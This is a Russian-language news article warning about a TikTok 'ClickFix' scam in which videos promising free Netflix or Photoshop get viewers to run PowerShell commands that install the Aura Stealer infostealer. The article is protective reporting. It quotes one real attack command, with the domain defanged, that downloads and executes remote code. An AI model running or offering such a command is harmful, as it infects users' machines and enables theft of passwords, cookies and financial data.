Опасная кампания TikTok обещает бесплатные аккаунты Netflix для установки вредоносного ПО и кражи данных: вот как её обнаружить
В TikTok обнаружена новая форма кражи данных: распространяются видеоролики, демонстрирующие предполагаемые методы загрузки бесплатных версий таких программ, как Windows, Netflix или Photoshop.
По словам эксперта по кибербезопасности Ксавье Мертенса из Центра интернет-штормов SANS (ISC), за этими поддельными обучающими материалами скрывается кибермошенничество, целью которого является кража личной и финансовой информации пользователей.
Видеоролики, написанные в непринужденном тоне и кажущиеся безобидными, инструктируют пользователей о том, как выполнять команды на компьютерах.
Photoshop — одно из приложений, которое обещает быть бесплатным и устанавливать вредоносное ПО. Фото: iStock
Однако вместо активации «премиум»-функций эти команды устанавливают вредоносное ПО. Этот метод, известный как ClickFix, ранее был описан порталом кибербезопасности Trend Micro и теперь распространился на TikTok из-за большого количества молодых пользователей, интересующихся техническими хитростями и бесплатными загрузками.
Мертенс предупредил, что TikTok стал привлекательным каналом для киберпреступников, поскольку доверие между создателями и пользователями способствует быстрому распространению вводящих в заблуждение видеороликов. «Это очень эффективная форма социальной инженерии. Люди доверяют создателям и не подозревают, что простая команда может поставить под угрозу их безопасность», — отметил аналитик.
Один из обнаруженных примеров демонстрирует видео, обещающее бесплатную активацию Photoshop и предлагающее пользователям выполнить следующую команду в PowerShell:
- iex (irm slmgr[.]win/photoshop).
Кража данных также осуществляется обещаниями бесплатного Netflix. Фото: iStock
Хотя эта инструкция выглядит безобидной, она фактически подключает компьютер к удалённому серверу, который загружает вредоносные файлы. Согласно сайту Bleeping Computer, эти файлы включают в себя вариант вредоносной программы Aura Stealer , способной извлекать пароли, сохранённые в браузерах, файлы cookie аутентификации, банковские данные и данные криптовалютных кошельков.
Эксперты рекомендуют всем, кто следовал инструкциям в этих видео, немедленно сменить все пароли, включая пароли от электронной почты, социальных сетей и банковских аккаунтов. Также следует провести полную проверку устройства с помощью обновлённого антивируса и избегать выполнения команд и загрузки чего-либо, не полученного из официальных источников.
Еще новости:
eltiempo
